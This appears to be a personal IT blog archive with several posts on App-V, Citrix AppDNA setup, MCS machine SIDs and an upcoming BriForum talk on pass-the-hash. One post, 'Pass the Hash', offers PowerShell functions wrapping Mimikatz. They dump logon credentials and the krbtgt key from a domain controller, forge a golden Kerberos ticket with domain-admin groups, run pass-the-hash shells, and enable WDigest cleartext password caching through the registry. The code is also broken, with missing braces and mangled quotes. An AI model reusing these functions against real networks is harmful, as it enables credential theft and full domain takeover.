Windows 10–1607 and App-V

With the new windows 10 version in place, App-V is integrated into the operating system. Probably you wonder what will happen to machine that gets an inplace upgrade with an installed App-V Client?

The cache stays and the App-V application gets uninstalled and the App-V feature gets enabled. So it should be a flawless migration from Windows 10 – 1511 with a current App-V Client to Windows 10-1607.


Windows 10–1607 and App-V

Pass the Hash

one of the main security issues with windows is pass the hash. I added some functions to the Mimikatz Powershell script that can be found here.


The functions that make the usage of mimikatz more easy. Just add these functions to the end of the mimikatz script and launch the script. Then the functions are in memory and available functions will be shown.

Function Global:invoke-mimiDom {
    if (Test-path „$ScriptPath\mimi_dom.log“) {
    $MimiUser =“didi44″
    write-host $scriptpath -foregroundcolor green
    $global:mimidata = Get-Content „$ScriptPath\mimi_dom.log“
    Foreach ($line in $mimidata){
    if ($line -match „aes256_hmac“) {$global:aes = $($line.split(„:“)[1]).trim()}
    if ($line -match „Domain :“) {$global:domSid = $($line.split(„/“)[1]).trim()}
    if ($line -match „Default Salt :“) {$global:domain = $($($line.split(„:“)[1]).trim()).replace(„krbtgt“,““)}

    $FullCMD= „kerberos::golden /domain:“ + $domain  + “ /sid:“ + $domsid + “ /aes256:“ + $aes + “ /user:“ + $mimiUser + “ /id:500 /groups:500,501,513,512,520,518,519 /ticket:forged.kirbi“
    Write-host $fullcmd
    invoke-mimikatz -command „privilege::debug kerberos::purge `“$fullcmd`“ `“kerberos::ptt forged.kirbi`“ misc::cmd“
    } ELSE {
        Write-host „there is no mimi_dom.log, please run first invoke-mimiexportdom  on a domain controller“ -foregroundcolor red


Function Global:invoke-mimiStd {
$global:mimi_tmp  = Invoke-Mimikatz
$mimi_TMP | Out-File „$ScriptPath\mimi.log“
$global:mimi = Get-Content „$ScriptPath\mimi.log“
foreach ($line in $mimi){
        if ($line -match „\* Username : Administrator“){
            $Global:mimiUsername1 = $($line.split(„:“)[1]).trim()
            $Global:mimiDom1 = $($mimi[$number].split(„:“)[1]).trim()
            $Global:mimiHash1 = $($mimi[$number+1].split(„:“)[1]).trim()
Write-host „$mimiusername1 $mimiDom1 $mimihash1“

FUNCTION Global:invoke-MimiExportDom {
if (!(test-path „$scriptpath\mimi_dom.log“)){
    $global:mimi_dom_tmp = Invoke-mimikatz -command „privilege::debug `“lsadump::lsa /inject /name:krbtgt`““
    $global:mimi_dom_tmp | Out-File „$scriptpath\mimi_dom.log“
    $global:mimi_dom = get-content „$ScriptPath\mimi_dom.log“

FUNCTION Global:Invoke-mimiDMP {
$dmps = get-childitem „$scriptpath\*.dmp“
foreach ($dmp in $dmps) {
    Write-host „analysing $dmp“ -foregroundcolor green
    $global:mimi = invoke-mimikatz -command „privilege::debug `“sekurlsa::minidump $dmp`“ sekurlsa::logonpasswords“
    Write-host $mimi

FUNCTION Global:Invoke-mimicmd {
    If ($mimiUsername1 -lt 1){
        Write-host „please run first invoke-mimiSTD“ -foregroundcolor red}
    ELSE {
        $command =  „privilege::debug `“sekurlsa::pth /user:“ + $mimiUsername1 + “ /domain:“+ $mimiDom1 + “ /ntlm:“ + $mimiHash1 +“ /run:cmd`““
        write-host „$command“
        $global:mimi = invoke-mimikatz -command $command


#sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND

If ($( get-itemproperty HKLM:\system\CurrentControlSet\Control\SecurityProviders\WDigest\).uselogoncredential -ne 1){
    reg add HKLM\system\CurrentControlSet\Control\SecurityProviders\WDigest -v UseLogonCredential -t Reg_DWORD /d 1
    Write-host „changed security provider – to see passeword in cleartext logoff and log on again“ -ForegroundColor Yellow

Write-host „the following functions are available:“
write-host „invoke-mimiStd“ -foregroundcolor green
write-host „invoke-mimiExportDom“ -foregroundcolor green
write-host „invoke-mimiDom“ -foregroundcolor green
write-host „invoke-mimiDmp“ -foregroundcolor green
write-host „invoke-mimiCMD“ -foregroundcolor green

Pass the Hash

AppDNA – Invalid user name or password

After the first installation of AppDNA the default username to log on is

Administrator with the password apps3cur3

The problem is that this did not work for me. I was logged in with a domain admin account also with the name administrator and it seemed AppDNA always tried to log me in with this account.

After I changed the AppDNA username Administrator to Admin1 in the database I could successfully log in


AppDNA – Invalid user name or password

Does Microsoft Buy Citrix?

I had a discussion with a colleague yesterday about what is happening with Citrix on a long term. My answer was Microsoft will buy them! Why? There are multiple small pieces that if you put them together the picture might look like that

1. the new Citrix CEO Kirill Tatrinov was originally working for Microsoft. Did you heard already anything from him? I did not hear any noise except that his Synergy keynote was not very well received. Maybe he is not really interested in keynotes because he is preparing something else?

2. Citrix sold all departments, that are totally not interesting for Microsoft like the whole online stuff. Microsoft already has products in this area that would compete with this – like skype for business vs gotomeeting.

3. Microsoft retired TMG – so they have nothing at the endpoint to the internet – their new strategy is cloud first, mobile first – would not netscaler fit perfectly?

4. Server 2016 has not much additional features announced for RDSH, it is an optimized gateway that host more users (indeed I heard they found a bug), multipoint server, OpenGL Support. That’s pretty it – so probably they just don’t develop that much anymore.

5. ARA – Azure Remote App is lacking management for larger environments – the citrix cloud products allow this (they anyhow already run on Azure)

So – I am curious what will happen in future!

Does Microsoft Buy Citrix?

AppDNA AND APPv Part 1

Probably a hidden feature in AppDNA is the possibility to create App-V packages. This can happen full automated. Honestly I don’t see AppV in general as an OS Compatibility mitigation technology. From my perspective if solves interoperability issues and migth ease deployment.

But if you are allowed to use AppDNA probably is is even a cool solution to optimize your current packaging process. What you need:

– AppDNA Server
– A VDI sequencer machine
– A VDI machine with an App-V Client
– Service Account with local admin rights on the machines
– a service account that can control your VDI on the hypervisor (Create snapshot and revert)

What you need in the first step is a hypervisor and a virtual machine. AppDNA will use this machine to create the sequence but you can still interact during the sequencing process if you want. Prepare the following for step 1:

A vritual machine with an installed sequencer, the “Citrix AppDNA VM Configuration.msi” needs to be installed. This tool will allow the AppDNA server to talk to the virtual machine. Because the agent is embedded in the RUN key you should also enable Autologon probably with the same named sysinternals tool. This will allow, that the agent starts after AppDNA resets the machine in a later step. Also don’t forget the standard cleanup tasks for your sequencer machine like disabling windows search or defender. Create now a snapshot.

What you need then to do in AppDNA:

Configure –> Solutions –> AppV

Define a name for the solution


Define a network share (if you Test it tells you which files AppDNA would like to store there)


Here is the screen for defining the two VMS – the first is the sequencer the second a test machine – select “Add VM”




Define your hypervisor


The service account to manage your hypervisor


Select the sequencing machine


Select or create a snapshot and check “Do not show the VM Console”

After this step AppDNA will reset your virtual machine to the snapshot


Here you define the name of your virtual machine – you should use an FQDN. The port is the default port used by the AppDNA agent. If your fails probably the computer is not logged in or AppDNA reverted to the wrong snapshot (happened to me under certain circumstances – now I only have one snapshot)


Define the output file share


Select what AppDNA should do with your VM


Here you get the summary


Repeat this steps for the second virtual machine

You should get this then


Here you can chose no to speed up


Nearly ready


Define how AppV Packages should be generated.


You are ready – press close.

Now you can use use solution to sequence applications that were imported to AppDNA!


AppDNA AND APPv Part 1

Citrix Machine creation service and SID

I was lately at a customer where we had some weird behavior so we checked all kind of stuff and realized, that all machines had the same sid. From my perspective this should not be an issue since Mark Russinovich released this article. The only issues persists, if two domain controllers have the same SID.

Then I checked with a couple of colleagues how it is in their environment, that is running smooth – and – all SIDs were the same. So it seems to be standard, that MCS is not changing the SID.

Another issue we found, is that MCS created always full clones on a VMWare based environment. This should only happen in a XenServer environment. The problem is, that the customer only had Terminal Server and not VDI. And MCS in combination with terminal Server images has no choice how the VMs should be deployed. If you look into in Citrix Studio for the powershell command, you can see, that the machines are created as full clone. Saying that it means, that if you want linked clones you cannot use the console but need to use a powershell script.

Citrix Machine creation service and SID

Briforum Lodon 2016

hi guys,

I am happy that I will attend brofurum london as a speaker on 19-20. mai 2016.

I will speak about how people might have attacked your domain by using the pass the hash method. From my believing most domains should be “infected” because it is ridiculous easy. Hope to see you on briforum. More content I will release here after my presentation. Attached a tool that I might use – please do not use this tool on your Computers!!!!

Test tool for my presentation

Briforum Lodon 2016